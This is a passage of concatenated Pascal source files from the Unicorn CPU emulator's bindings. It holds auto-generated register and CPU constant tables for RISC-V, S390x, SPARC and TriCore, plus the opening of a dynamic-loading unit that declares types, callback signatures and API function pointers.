UC_RISCV_REG_SBADADDR = 144; UC_RISCV_REG_SPTBR = 145; UC_RISCV_REG_SATP = 146; UC_RISCV_REG_HSTATUS = 147; UC_RISCV_REG_HEDELEG = 148; UC_RISCV_REG_HIDELEG = 149; UC_RISCV_REG_HIE = 150; UC_RISCV_REG_HCOUNTEREN = 151; UC_RISCV_REG_HTVAL = 152; UC_RISCV_REG_HIP = 153; UC_RISCV_REG_HTINST = 154; UC_RISCV_REG_HGATP = 155; UC_RISCV_REG_HTIMEDELTA = 156; UC_RISCV_REG_HTIMEDELTAH = 157; // Floating-point registers UC_RISCV_REG_F0 = 158; UC_RISCV_REG_F1 = 159; UC_RISCV_REG_F2 = 160; UC_RISCV_REG_F3 = 161; UC_RISCV_REG_F4 = 162; UC_RISCV_REG_F5 = 163; UC_RISCV_REG_F6 = 164; UC_RISCV_REG_F7 = 165; UC_RISCV_REG_F8 = 166; UC_RISCV_REG_F9 = 167; UC_RISCV_REG_F10 = 168; UC_RISCV_REG_F11 = 169; UC_RISCV_REG_F12 = 170; UC_RISCV_REG_F13 = 171; UC_RISCV_REG_F14 = 172; UC_RISCV_REG_F15 = 173; UC_RISCV_REG_F16 = 174; UC_RISCV_REG_F17 = 175; UC_RISCV_REG_F18 = 176; UC_RISCV_REG_F19 = 177; UC_RISCV_REG_F20 = 178; UC_RISCV_REG_F21 = 179; UC_RISCV_REG_F22 = 180; UC_RISCV_REG_F23 = 181; UC_RISCV_REG_F24 = 182; UC_RISCV_REG_F25 = 183; UC_RISCV_REG_F26 = 184; UC_RISCV_REG_F27 = 185; UC_RISCV_REG_F28 = 186; UC_RISCV_REG_F29 = 187; 
UC_RISCV_REG_F30 = 188; UC_RISCV_REG_F31 = 189; UC_RISCV_REG_PC = 190; UC_RISCV_REG_ENDING = 191; // Alias registers UC_RISCV_REG_ZERO = 1; UC_RISCV_REG_RA = 2; UC_RISCV_REG_SP = 3; UC_RISCV_REG_GP = 4; UC_RISCV_REG_TP = 5; UC_RISCV_REG_T0 = 6; UC_RISCV_REG_T1 = 7; UC_RISCV_REG_T2 = 8; UC_RISCV_REG_S0 = 9; UC_RISCV_REG_FP = 9; UC_RISCV_REG_S1 = 10; UC_RISCV_REG_A0 = 11; UC_RISCV_REG_A1 = 12; UC_RISCV_REG_A2 = 13; UC_RISCV_REG_A3 = 14; UC_RISCV_REG_A4 = 15; UC_RISCV_REG_A5 = 16; UC_RISCV_REG_A6 = 17; UC_RISCV_REG_A7 = 18; UC_RISCV_REG_S2 = 19; UC_RISCV_REG_S3 = 20; UC_RISCV_REG_S4 = 21; UC_RISCV_REG_S5 = 22; UC_RISCV_REG_S6 = 23; UC_RISCV_REG_S7 = 24; UC_RISCV_REG_S8 = 25; UC_RISCV_REG_S9 = 26; UC_RISCV_REG_S10 = 27; UC_RISCV_REG_S11 = 28; UC_RISCV_REG_T3 = 29; UC_RISCV_REG_T4 = 30; UC_RISCV_REG_T5 = 31; UC_RISCV_REG_T6 = 32; UC_RISCV_REG_FT0 = 158; UC_RISCV_REG_FT1 = 159; UC_RISCV_REG_FT2 = 160; UC_RISCV_REG_FT3 = 161; UC_RISCV_REG_FT4 = 162; UC_RISCV_REG_FT5 = 163; UC_RISCV_REG_FT6 = 164; UC_RISCV_REG_FT7 = 165; UC_RISCV_REG_FS0 = 166; UC_RISCV_REG_FS1 = 167; UC_RISCV_REG_FA0 = 168; UC_RISCV_REG_FA1 = 169; UC_RISCV_REG_FA2 = 170; UC_RISCV_REG_FA3 = 171; UC_RISCV_REG_FA4 = 172; UC_RISCV_REG_FA5 = 173; UC_RISCV_REG_FA6 = 174; UC_RISCV_REG_FA7 = 175; UC_RISCV_REG_FS2 = 176; UC_RISCV_REG_FS3 = 177; UC_RISCV_REG_FS4 = 178; UC_RISCV_REG_FS5 = 179; UC_RISCV_REG_FS6 = 180; UC_RISCV_REG_FS7 = 181; UC_RISCV_REG_FS8 = 182; UC_RISCV_REG_FS9 = 183; UC_RISCV_REG_FS10 = 184; UC_RISCV_REG_FS11 = 185; UC_RISCV_REG_FT8 = 186; UC_RISCV_REG_FT9 = 187; UC_RISCV_REG_FT10 = 188; UC_RISCV_REG_FT11 = 189; implementation end.�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/pascal/unicorn/S390xConst.pas������������������������������������������������0000664�0000000�0000000�00000005625�14675241067�0022273�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. 
// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT
unit S390xConst;

interface

const
// S390X CPU
UC_CPU_S390X_Z900 = 0; UC_CPU_S390X_Z900_2 = 1; UC_CPU_S390X_Z900_3 = 2; UC_CPU_S390X_Z800 = 3; UC_CPU_S390X_Z990 = 4; UC_CPU_S390X_Z990_2 = 5; UC_CPU_S390X_Z990_3 = 6; UC_CPU_S390X_Z890 = 7; UC_CPU_S390X_Z990_4 = 8; UC_CPU_S390X_Z890_2 = 9; UC_CPU_S390X_Z990_5 = 10; UC_CPU_S390X_Z890_3 = 11; UC_CPU_S390X_Z9EC = 12; UC_CPU_S390X_Z9EC_2 = 13; UC_CPU_S390X_Z9BC = 14; UC_CPU_S390X_Z9EC_3 = 15; UC_CPU_S390X_Z9BC_2 = 16; UC_CPU_S390X_Z10EC = 17; UC_CPU_S390X_Z10EC_2 = 18; UC_CPU_S390X_Z10BC = 19; UC_CPU_S390X_Z10EC_3 = 20; UC_CPU_S390X_Z10BC_2 = 21; UC_CPU_S390X_Z196 = 22; UC_CPU_S390X_Z196_2 = 23; UC_CPU_S390X_Z114 = 24; UC_CPU_S390X_ZEC12 = 25; UC_CPU_S390X_ZEC12_2 = 26; UC_CPU_S390X_ZBC12 = 27; UC_CPU_S390X_Z13 = 28; UC_CPU_S390X_Z13_2 = 29; UC_CPU_S390X_Z13S = 30; UC_CPU_S390X_Z14 = 31; UC_CPU_S390X_Z14_2 = 32; UC_CPU_S390X_Z14ZR1 = 33; UC_CPU_S390X_GEN15A = 34; UC_CPU_S390X_GEN15B = 35; UC_CPU_S390X_QEMU = 36; UC_CPU_S390X_MAX = 37; UC_CPU_S390X_ENDING = 38;

// S390X registers
UC_S390X_REG_INVALID = 0;
// General purpose registers
UC_S390X_REG_R0 = 1; UC_S390X_REG_R1 = 2; UC_S390X_REG_R2 = 3; UC_S390X_REG_R3 = 4; UC_S390X_REG_R4 = 5; UC_S390X_REG_R5 = 6; UC_S390X_REG_R6 = 7; UC_S390X_REG_R7 = 8; UC_S390X_REG_R8 = 9; UC_S390X_REG_R9 = 10; UC_S390X_REG_R10 = 11; UC_S390X_REG_R11 = 12; UC_S390X_REG_R12 = 13; UC_S390X_REG_R13 = 14; UC_S390X_REG_R14 = 15; UC_S390X_REG_R15 = 16;
// Floating point registers
UC_S390X_REG_F0 = 17; UC_S390X_REG_F1 = 18; UC_S390X_REG_F2 = 19; UC_S390X_REG_F3 = 20; UC_S390X_REG_F4 = 21; UC_S390X_REG_F5 = 22; UC_S390X_REG_F6 = 23; UC_S390X_REG_F7 = 24; UC_S390X_REG_F8 = 25; UC_S390X_REG_F9 = 26; UC_S390X_REG_F10 = 27; UC_S390X_REG_F11 = 28; UC_S390X_REG_F12 = 29; UC_S390X_REG_F13 = 30; UC_S390X_REG_F14 = 31; UC_S390X_REG_F15 = 32; UC_S390X_REG_F16 = 33; UC_S390X_REG_F17 = 34; UC_S390X_REG_F18 = 35; UC_S390X_REG_F19 = 36; UC_S390X_REG_F20 = 37; UC_S390X_REG_F21 = 38; UC_S390X_REG_F22 = 39; UC_S390X_REG_F23 = 40; UC_S390X_REG_F24 = 41; UC_S390X_REG_F25 = 42; UC_S390X_REG_F26 = 43; UC_S390X_REG_F27 = 44; UC_S390X_REG_F28 = 45; UC_S390X_REG_F29 = 46; UC_S390X_REG_F30 = 47; UC_S390X_REG_F31 = 48;
// Access registers
UC_S390X_REG_A0 = 49; UC_S390X_REG_A1 = 50; UC_S390X_REG_A2 = 51; UC_S390X_REG_A3 = 52; UC_S390X_REG_A4 = 53; UC_S390X_REG_A5 = 54; UC_S390X_REG_A6 = 55; UC_S390X_REG_A7 = 56; UC_S390X_REG_A8 = 57; UC_S390X_REG_A9 = 58; UC_S390X_REG_A10 = 59; UC_S390X_REG_A11 = 60; UC_S390X_REG_A12 = 61; UC_S390X_REG_A13 = 62; UC_S390X_REG_A14 = 63; UC_S390X_REG_A15 = 64;
UC_S390X_REG_PC = 65; UC_S390X_REG_PSWM = 66; UC_S390X_REG_ENDING = 67;
// Alias registers

implementation
end.

// ===== File: unicorn-2.1.1/bindings/pascal/unicorn/SparcConst.pas =====
// For Unicorn Engine.
AUTO-GENERATED FILE, DO NOT EDIT unit SparcConst; interface const // SPARC32 CPU UC_CPU_SPARC32_FUJITSU_MB86904 = 0; UC_CPU_SPARC32_FUJITSU_MB86907 = 1; UC_CPU_SPARC32_TI_MICROSPARC_I = 2; UC_CPU_SPARC32_TI_MICROSPARC_II = 3; UC_CPU_SPARC32_TI_MICROSPARC_IIEP = 4; UC_CPU_SPARC32_TI_SUPERSPARC_40 = 5; UC_CPU_SPARC32_TI_SUPERSPARC_50 = 6; UC_CPU_SPARC32_TI_SUPERSPARC_51 = 7; UC_CPU_SPARC32_TI_SUPERSPARC_60 = 8; UC_CPU_SPARC32_TI_SUPERSPARC_61 = 9; UC_CPU_SPARC32_TI_SUPERSPARC_II = 10; UC_CPU_SPARC32_LEON2 = 11; UC_CPU_SPARC32_LEON3 = 12; UC_CPU_SPARC32_ENDING = 13; // SPARC64 CPU UC_CPU_SPARC64_FUJITSU = 0; UC_CPU_SPARC64_FUJITSU_III = 1; UC_CPU_SPARC64_FUJITSU_IV = 2; UC_CPU_SPARC64_FUJITSU_V = 3; UC_CPU_SPARC64_TI_ULTRASPARC_I = 4; UC_CPU_SPARC64_TI_ULTRASPARC_II = 5; UC_CPU_SPARC64_TI_ULTRASPARC_III = 6; UC_CPU_SPARC64_TI_ULTRASPARC_IIE = 7; UC_CPU_SPARC64_SUN_ULTRASPARC_III = 8; UC_CPU_SPARC64_SUN_ULTRASPARC_III_CU = 9; UC_CPU_SPARC64_SUN_ULTRASPARC_IIII = 10; UC_CPU_SPARC64_SUN_ULTRASPARC_IV = 11; UC_CPU_SPARC64_SUN_ULTRASPARC_IV_PLUS = 12; UC_CPU_SPARC64_SUN_ULTRASPARC_IIII_PLUS = 13; UC_CPU_SPARC64_SUN_ULTRASPARC_T1 = 14; UC_CPU_SPARC64_SUN_ULTRASPARC_T2 = 15; UC_CPU_SPARC64_NEC_ULTRASPARC_I = 16; UC_CPU_SPARC64_ENDING = 17; // SPARC registers UC_SPARC_REG_INVALID = 0; UC_SPARC_REG_F0 = 1; UC_SPARC_REG_F1 = 2; UC_SPARC_REG_F2 = 3; UC_SPARC_REG_F3 = 4; UC_SPARC_REG_F4 = 5; UC_SPARC_REG_F5 = 6; UC_SPARC_REG_F6 = 7; UC_SPARC_REG_F7 = 8; UC_SPARC_REG_F8 = 9; UC_SPARC_REG_F9 = 10; UC_SPARC_REG_F10 = 11; UC_SPARC_REG_F11 = 12; UC_SPARC_REG_F12 = 13; UC_SPARC_REG_F13 = 14; UC_SPARC_REG_F14 = 15; UC_SPARC_REG_F15 = 16; UC_SPARC_REG_F16 = 17; UC_SPARC_REG_F17 = 18; UC_SPARC_REG_F18 = 19; UC_SPARC_REG_F19 = 20; UC_SPARC_REG_F20 = 21; UC_SPARC_REG_F21 = 22; UC_SPARC_REG_F22 = 23; UC_SPARC_REG_F23 = 24; UC_SPARC_REG_F24 = 25; UC_SPARC_REG_F25 = 26; UC_SPARC_REG_F26 = 27; UC_SPARC_REG_F27 = 28; UC_SPARC_REG_F28 = 29; UC_SPARC_REG_F29 = 30; UC_SPARC_REG_F30 = 31; UC_SPARC_REG_F31 = 32; UC_SPARC_REG_F32 = 33; UC_SPARC_REG_F34 = 34; UC_SPARC_REG_F36 = 35; UC_SPARC_REG_F38 = 36; UC_SPARC_REG_F40 = 37; UC_SPARC_REG_F42 = 38; UC_SPARC_REG_F44 = 39; UC_SPARC_REG_F46 = 40; UC_SPARC_REG_F48 = 41; UC_SPARC_REG_F50 = 42; UC_SPARC_REG_F52 = 43; UC_SPARC_REG_F54 = 44; UC_SPARC_REG_F56 = 45; UC_SPARC_REG_F58 = 46; UC_SPARC_REG_F60 = 47; UC_SPARC_REG_F62 = 48; UC_SPARC_REG_FCC0 = 49; UC_SPARC_REG_FCC1 = 50; UC_SPARC_REG_FCC2 = 51; UC_SPARC_REG_FCC3 = 52; UC_SPARC_REG_G0 = 53; UC_SPARC_REG_G1 = 54; UC_SPARC_REG_G2 = 55; UC_SPARC_REG_G3 = 56; UC_SPARC_REG_G4 = 57; UC_SPARC_REG_G5 = 58; UC_SPARC_REG_G6 = 59; UC_SPARC_REG_G7 = 60; UC_SPARC_REG_I0 = 61; UC_SPARC_REG_I1 = 62; UC_SPARC_REG_I2 = 63; UC_SPARC_REG_I3 = 64; UC_SPARC_REG_I4 = 65; UC_SPARC_REG_I5 = 66; UC_SPARC_REG_FP = 67; UC_SPARC_REG_I7 = 68; UC_SPARC_REG_ICC = 69; UC_SPARC_REG_L0 = 70; UC_SPARC_REG_L1 = 71; UC_SPARC_REG_L2 = 72; UC_SPARC_REG_L3 = 73; UC_SPARC_REG_L4 = 74; UC_SPARC_REG_L5 = 75; UC_SPARC_REG_L6 = 76; UC_SPARC_REG_L7 = 77; UC_SPARC_REG_O0 = 78; UC_SPARC_REG_O1 = 79; UC_SPARC_REG_O2 = 80; UC_SPARC_REG_O3 = 81; UC_SPARC_REG_O4 = 82; UC_SPARC_REG_O5 = 83; UC_SPARC_REG_SP = 84; UC_SPARC_REG_O7 = 85; UC_SPARC_REG_Y = 86; UC_SPARC_REG_XCC = 87; UC_SPARC_REG_PC = 88; UC_SPARC_REG_ENDING = 89; UC_SPARC_REG_O6 = 84; UC_SPARC_REG_I6 = 67; implementation 
end.

// ===== File: unicorn-2.1.1/bindings/pascal/unicorn/TriCoreConst.pas =====
// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT
unit TriCoreConst;

interface

const
// TRICORE CPU
UC_CPU_TRICORE_TC1796 = 0; UC_CPU_TRICORE_TC1797 = 1; UC_CPU_TRICORE_TC27X = 2; UC_CPU_TRICORE_ENDING = 3;

// TRICORE registers
UC_TRICORE_REG_INVALID = 0;
UC_TRICORE_REG_A0 = 1; UC_TRICORE_REG_A1 = 2; UC_TRICORE_REG_A2 = 3; UC_TRICORE_REG_A3 = 4; UC_TRICORE_REG_A4 = 5; UC_TRICORE_REG_A5 = 6; UC_TRICORE_REG_A6 = 7; UC_TRICORE_REG_A7 = 8; UC_TRICORE_REG_A8 = 9; UC_TRICORE_REG_A9 = 10; UC_TRICORE_REG_A10 = 11; UC_TRICORE_REG_A11 = 12; UC_TRICORE_REG_A12 = 13; UC_TRICORE_REG_A13 = 14; UC_TRICORE_REG_A14 = 15; UC_TRICORE_REG_A15 = 16;
UC_TRICORE_REG_D0 = 17; UC_TRICORE_REG_D1 = 18; UC_TRICORE_REG_D2 = 19; UC_TRICORE_REG_D3 = 20; UC_TRICORE_REG_D4 = 21; UC_TRICORE_REG_D5 = 22; UC_TRICORE_REG_D6 = 23; UC_TRICORE_REG_D7 = 24; UC_TRICORE_REG_D8 = 25; UC_TRICORE_REG_D9 = 26; UC_TRICORE_REG_D10 = 27; UC_TRICORE_REG_D11 = 28; UC_TRICORE_REG_D12 = 29; UC_TRICORE_REG_D13 = 30; UC_TRICORE_REG_D14 = 31; UC_TRICORE_REG_D15 = 32;
UC_TRICORE_REG_PCXI = 33; UC_TRICORE_REG_PSW = 34; UC_TRICORE_REG_PSW_USB_C = 35; UC_TRICORE_REG_PSW_USB_V = 36; UC_TRICORE_REG_PSW_USB_SV = 37; UC_TRICORE_REG_PSW_USB_AV = 38; UC_TRICORE_REG_PSW_USB_SAV = 39; UC_TRICORE_REG_PC = 40; UC_TRICORE_REG_SYSCON = 41; UC_TRICORE_REG_CPU_ID = 42; UC_TRICORE_REG_BIV = 43; UC_TRICORE_REG_BTV = 44; UC_TRICORE_REG_ISP = 45; UC_TRICORE_REG_ICR = 46; UC_TRICORE_REG_FCX = 47; UC_TRICORE_REG_LCX = 48; UC_TRICORE_REG_COMPAT = 49;
UC_TRICORE_REG_DPR0_U = 50; UC_TRICORE_REG_DPR1_U = 51; UC_TRICORE_REG_DPR2_U = 52; UC_TRICORE_REG_DPR3_U = 53; UC_TRICORE_REG_DPR0_L = 54; UC_TRICORE_REG_DPR1_L = 55; UC_TRICORE_REG_DPR2_L = 56; UC_TRICORE_REG_DPR3_L = 57; UC_TRICORE_REG_CPR0_U = 58; UC_TRICORE_REG_CPR1_U = 59; UC_TRICORE_REG_CPR2_U = 60; UC_TRICORE_REG_CPR3_U = 61; UC_TRICORE_REG_CPR0_L = 62; UC_TRICORE_REG_CPR1_L = 63; UC_TRICORE_REG_CPR2_L = 64; UC_TRICORE_REG_CPR3_L = 65;
UC_TRICORE_REG_DPM0 = 66; UC_TRICORE_REG_DPM1 = 67; UC_TRICORE_REG_DPM2 = 68; UC_TRICORE_REG_DPM3 = 69; UC_TRICORE_REG_CPM0 = 70; UC_TRICORE_REG_CPM1 = 71; UC_TRICORE_REG_CPM2 = 72; UC_TRICORE_REG_CPM3 = 73; UC_TRICORE_REG_MMU_CON = 74; UC_TRICORE_REG_MMU_ASI = 75; UC_TRICORE_REG_MMU_TVA = 76; UC_TRICORE_REG_MMU_TPA = 77; UC_TRICORE_REG_MMU_TPX = 78; UC_TRICORE_REG_MMU_TFA = 79; UC_TRICORE_REG_BMACON = 80; UC_TRICORE_REG_SMACON = 81; UC_TRICORE_REG_DIEAR = 82; UC_TRICORE_REG_DIETR = 83; UC_TRICORE_REG_CCDIER = 84; UC_TRICORE_REG_MIECON = 85; UC_TRICORE_REG_PIEAR = 86; UC_TRICORE_REG_PIETR = 87; UC_TRICORE_REG_CCPIER = 88;
UC_TRICORE_REG_DBGSR = 89; UC_TRICORE_REG_EXEVT = 90; UC_TRICORE_REG_CREVT = 91; UC_TRICORE_REG_SWEVT = 92; UC_TRICORE_REG_TR0EVT = 93; UC_TRICORE_REG_TR1EVT = 94; UC_TRICORE_REG_DMS = 95; UC_TRICORE_REG_DCX = 96; UC_TRICORE_REG_DBGTCR = 97; UC_TRICORE_REG_CCTRL = 98; UC_TRICORE_REG_CCNT = 99; UC_TRICORE_REG_ICNT = 100; UC_TRICORE_REG_M1CNT = 101; UC_TRICORE_REG_M2CNT = 102; UC_TRICORE_REG_M3CNT = 103; UC_TRICORE_REG_ENDING = 104;
UC_TRICORE_REG_GA0 = 1; UC_TRICORE_REG_GA1 = 2; UC_TRICORE_REG_GA8 = 9; UC_TRICORE_REG_GA9 = 10; UC_TRICORE_REG_SP = 11; UC_TRICORE_REG_LR = 12; UC_TRICORE_REG_IA = 16; UC_TRICORE_REG_ID = 32;

implementation
end.

// ===== File: unicorn-2.1.1/bindings/pascal/unicorn/UnicornConst.pas =====
// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT
unit UnicornConst;

interface

const
UC_API_MAJOR = 2; UC_API_MINOR = 1; UC_API_PATCH = 0; UC_API_EXTRA = 255; UC_VERSION_MAJOR = 2; UC_VERSION_MINOR = 1; UC_VERSION_PATCH = 0; UC_VERSION_EXTRA = 255; UC_SECOND_SCALE = 1000000; UC_MILISECOND_SCALE = 1000;

UC_ARCH_ARM = 1; UC_ARCH_ARM64 = 2; UC_ARCH_MIPS = 3; UC_ARCH_X86 = 4; UC_ARCH_PPC = 5; UC_ARCH_SPARC = 6; UC_ARCH_M68K = 7; UC_ARCH_RISCV = 8; UC_ARCH_S390X = 9; UC_ARCH_TRICORE = 10; UC_ARCH_MAX = 11;

UC_MODE_LITTLE_ENDIAN = 0; UC_MODE_BIG_ENDIAN = 1073741824; UC_MODE_ARM = 0; UC_MODE_THUMB = 16; UC_MODE_MCLASS = 32; UC_MODE_V8 = 64; UC_MODE_ARMBE8 = 1024; UC_MODE_ARM926 = 128; UC_MODE_ARM946 = 256; UC_MODE_ARM1176 = 512; UC_MODE_MICRO = 16; UC_MODE_MIPS3 = 32; UC_MODE_MIPS32R6 = 64; UC_MODE_MIPS32 = 4; UC_MODE_MIPS64 = 8; UC_MODE_16 = 2; UC_MODE_32 = 4; UC_MODE_64 = 8; UC_MODE_PPC32 = 4; UC_MODE_PPC64 = 8; UC_MODE_QPX = 16; UC_MODE_SPARC32 = 4; UC_MODE_SPARC64 = 8; UC_MODE_V9 = 16; UC_MODE_RISCV32 = 4; UC_MODE_RISCV64 = 8;

UC_ERR_OK = 0; UC_ERR_NOMEM = 1; UC_ERR_ARCH = 2; UC_ERR_HANDLE = 3; UC_ERR_MODE = 4; UC_ERR_VERSION = 5; UC_ERR_READ_UNMAPPED = 6; UC_ERR_WRITE_UNMAPPED = 7; UC_ERR_FETCH_UNMAPPED = 8; UC_ERR_HOOK = 9; UC_ERR_INSN_INVALID = 10; UC_ERR_MAP = 11; UC_ERR_WRITE_PROT = 12; UC_ERR_READ_PROT = 13; UC_ERR_FETCH_PROT = 14; UC_ERR_ARG = 15; UC_ERR_READ_UNALIGNED = 16; UC_ERR_WRITE_UNALIGNED = 17; UC_ERR_FETCH_UNALIGNED = 18; UC_ERR_HOOK_EXIST = 19; UC_ERR_RESOURCE = 20; UC_ERR_EXCEPTION = 21; UC_ERR_OVERFLOW = 22;

UC_MEM_READ = 16; UC_MEM_WRITE = 17; UC_MEM_FETCH = 18; UC_MEM_READ_UNMAPPED = 19; UC_MEM_WRITE_UNMAPPED = 20; UC_MEM_FETCH_UNMAPPED = 21; UC_MEM_WRITE_PROT = 22; UC_MEM_READ_PROT = 23; UC_MEM_FETCH_PROT = 24; UC_MEM_READ_AFTER = 25;

UC_TCG_OP_SUB = 0; UC_TCG_OP_FLAG_CMP = 1; UC_TCG_OP_FLAG_DIRECT = 2;

UC_HOOK_INTR = 1; UC_HOOK_INSN = 2; UC_HOOK_CODE = 4; UC_HOOK_BLOCK = 8; UC_HOOK_MEM_READ_UNMAPPED = 16; UC_HOOK_MEM_WRITE_UNMAPPED = 32; UC_HOOK_MEM_FETCH_UNMAPPED = 64; UC_HOOK_MEM_READ_PROT = 128; UC_HOOK_MEM_WRITE_PROT = 256; UC_HOOK_MEM_FETCH_PROT = 512; UC_HOOK_MEM_READ = 1024; UC_HOOK_MEM_WRITE = 2048; UC_HOOK_MEM_FETCH = 4096; UC_HOOK_MEM_READ_AFTER = 8192; UC_HOOK_INSN_INVALID = 16384;
UC_HOOK_EDGE_GENERATED = 32768; UC_HOOK_TCG_OPCODE = 65536; UC_HOOK_TLB_FILL = 131072; UC_HOOK_MEM_UNMAPPED = 112; UC_HOOK_MEM_PROT = 896; UC_HOOK_MEM_READ_INVALID = 144; UC_HOOK_MEM_WRITE_INVALID = 288; UC_HOOK_MEM_FETCH_INVALID = 576; UC_HOOK_MEM_INVALID = 1008; UC_HOOK_MEM_VALID = 7168;

UC_QUERY_MODE = 1; UC_QUERY_PAGE_SIZE = 2; UC_QUERY_ARCH = 3; UC_QUERY_TIMEOUT = 4;

UC_CTL_IO_NONE = 0; UC_CTL_IO_WRITE = 1; UC_CTL_IO_READ = 2; UC_CTL_IO_READ_WRITE = 3; UC_TLB_CPU = 0; UC_TLB_VIRTUAL = 1;

UC_CTL_UC_MODE = 0; UC_CTL_UC_PAGE_SIZE = 1; UC_CTL_UC_ARCH = 2; UC_CTL_UC_TIMEOUT = 3; UC_CTL_UC_USE_EXITS = 4; UC_CTL_UC_EXITS_CNT = 5; UC_CTL_UC_EXITS = 6; UC_CTL_CPU_MODEL = 7; UC_CTL_TB_REQUEST_CACHE = 8; UC_CTL_TB_REMOVE_CACHE = 9; UC_CTL_TB_FLUSH = 10; UC_CTL_TLB_FLUSH = 11; UC_CTL_TLB_TYPE = 12; UC_CTL_TCG_BUFFER_SIZE = 13; UC_CTL_CONTEXT_MODE = 14;

UC_PROT_NONE = 0; UC_PROT_READ = 1; UC_PROT_WRITE = 2; UC_PROT_EXEC = 4; UC_PROT_ALL = 7;

UC_CTL_CONTEXT_CPU = 1; UC_CTL_CONTEXT_MEMORY = 2;

implementation
end.

// ===== File: unicorn-2.1.1/bindings/pascal/unicorn/Unicorn_dyn.pas =====
{
  FreePascal/Delphi bindings for the UnicornEngine Emulator Engine.
  Tested on Mac - Win - Linux with FreePascal v3.0.4 & Delphi Berlin 10.2.

  Copyright(c) 2018 Coldzer0 <Coldzer0 [at] protonmail.ch>
  License: GPLv2
}
unit Unicorn_dyn;

{$IFDEF FPC}
  {$MODE Delphi}
  {$PackRecords C}
{$ENDIF}

interface

uses
  {$IFDEF FPC}dynlibs,Crt{$ELSE}
  {$ifdef mswindows} windows,sysutils {$ENDIF}
  {$ENDIF};

const
  {$IFDEF Darwin} UNICORN_LIB = './libunicorn.dylib'; {$ENDIF}
  {$ifdef Linux} UNICORN_LIB = './libunicorn.so'; {$endif}
  {$ifdef mswindows} UNICORN_LIB = './unicorn.dll'; {$endif}

type
  uc_engine = Pointer;
  uc_context = Pointer; // Opaque storage for CPU context, used with uc_context_*()
  uc_hook = UIntPtr;
  uc_arch = Cardinal;
  uc_mode = Cardinal;
  uc_err = Cardinal;
  uc_query_type = Cardinal;

{$IFNDEF FPC} // Delphi support
  PUInt32 = ^UInt32;
{$ENDIF}

type
  { Callback functions

    Callback function for tracing code (UC_HOOK_CODE & UC_HOOK_BLOCK)
    @address: address where the code is being executed
    @size: size of machine instruction(s) being executed, or 0 when size is unknown
    @user_data: user data passed to tracing APIs. }
  uc_cb_hookcode_t = procedure(uc : uc_engine; address : UInt64; size : UInt32; user_data : Pointer); cdecl;

  { Callback function for tracing interrupts (for uc_hook_intr())
    @intno: interrupt number
    @user_data: user data passed to tracing APIs. }
  uc_cb_hookintr_t = procedure(uc : uc_engine; intno : UInt32; user_data : Pointer); cdecl;

  { Callback function for tracing the IN instruction of X86
    @port: port number
    @size: data size (1/2/4) to be read from this port
    @user_data: user data passed to tracing APIs. }
  uc_cb_insn_in_t = function(uc : uc_engine; port : UInt32; siz : integer; user_data : Pointer) : UInt32; cdecl;
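  (* Example (editor's illustrative sketch, not part of the original binding):
     a code-trace callback matching uc_cb_hookcode_t above. It must use the
     cdecl calling convention and is later passed to uc_hook_add() as a plain
     pointer. IntToHex comes from the SysUtils unit.

       procedure HookCode(uc : uc_engine; address : UInt64; size : UInt32;
                          user_data : Pointer); cdecl;
       begin
         // Called once per traced instruction; size may be 0 when unknown.
         WriteLn('Tracing instruction at 0x', IntToHex(address, 16),
                 ', instruction size = ', size);
       end;
  *)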
  { Callback function for the OUT instruction of X86
    @port: port number
    @size: data size (1/2/4) to be written to this port
    @value: data value to be written to this port
    @user_data: user data passed to tracing APIs. }
  uc_cb_insn_out_t = procedure(uc : uc_engine; port : UInt32; size : integer; value : UInt32; user_data : Pointer); cdecl;

  // All types of memory accesses for UC_HOOK_MEM_*
  uc_mem_type = integer;

  // All types of hooks for the uc_hook_add() API.
  uc_hook_type = integer;

  { Callback function for hooking memory (UC_MEM_READ, UC_MEM_WRITE & UC_MEM_FETCH)
    @type: this memory is being READ, or WRITE
    @address: address where the code is being executed
    @size: size of data being read or written
    @value: value of data being written to memory, or irrelevant if type = READ.
    @user_data: user data passed to tracing APIs }
  uc_cb_hookmem_t = procedure(uc : uc_engine; _type : uc_mem_type; address : UInt64; size : integer; value : Int64; user_data : Pointer); cdecl;

  { Callback function for handling invalid memory access events (UNMAPPED and PROT events)
    @type: this memory is being READ, or WRITE
    @address: address where the code is being executed
    @size: size of data being read or written
    @value: value of data being written to memory, or irrelevant if type = READ.
    @user_data: user data passed to tracing APIs
    @return: return true to continue, or false to stop the program (due to invalid memory).

    NOTE: returning true to continue execution will only work if the accessed
    memory is made accessible with the correct permissions during the hook.

    In the event of a UC_MEM_READ_UNMAPPED or UC_MEM_WRITE_UNMAPPED callback,
    the memory should be uc_mem_map()-ed with the correct permissions, and the
    instruction will then read or write to the address as it was supposed to.

    In the event of a UC_MEM_FETCH_UNMAPPED callback, the memory can be mapped
    in as executable, in which case execution will resume from the fetched
    address. The instruction pointer may be written to in order to change where
    execution resumes, but the fetch must succeed if execution is to resume. }
  uc_cb_eventmem_t = function(uc : uc_engine; _type : uc_mem_type; address : UInt64; size : integer; value : Int64; user_data : Pointer) : LongBool; cdecl;

type
  { Memory region mapped by uc_mem_map() and uc_mem_map_ptr()
    Retrieve the list of memory regions with uc_mem_regions() }
  uc_mem_region = record
    rBegin : UInt64; // begin address of the region (inclusive)
    rEnd   : UInt64; // end address of the region (inclusive)
    rPerms : UInt32; // memory permissions of the region
  end;
  uc_mem_regionArray = array[0..(MaxInt div SizeOf(uc_mem_region))-1] of uc_mem_region;
  Puc_mem_regionArray = ^uc_mem_regionArray;

// Exports
var
  (* Return combined API version & major and minor version numbers.
     @major: major number of API version
     @minor: minor number of API version
     @return hexadecimal number as (major << 8 | minor), which encodes both
     major & minor versions.
     NOTE: This returned value can be compared with a version number made with
     the UC_MAKE_VERSION macro. For example, the second API version would
     return 1 in @major and 1 in @minor; the return value would be 0x0101.
     NOTE: if you only care about the returned value, but not major and minor
     values, set both @major & @minor arguments to NULL. *)
  uc_version : function (var major, minor : Cardinal) : Cardinal; cdecl;

  (* Determine if the given architecture is supported by this library.
     @arch: architecture type (UC_ARCH_*)
     @return True if this library supports the given arch. *)
  uc_arch_supported : function (arch : uc_arch) : LongBool; cdecl;
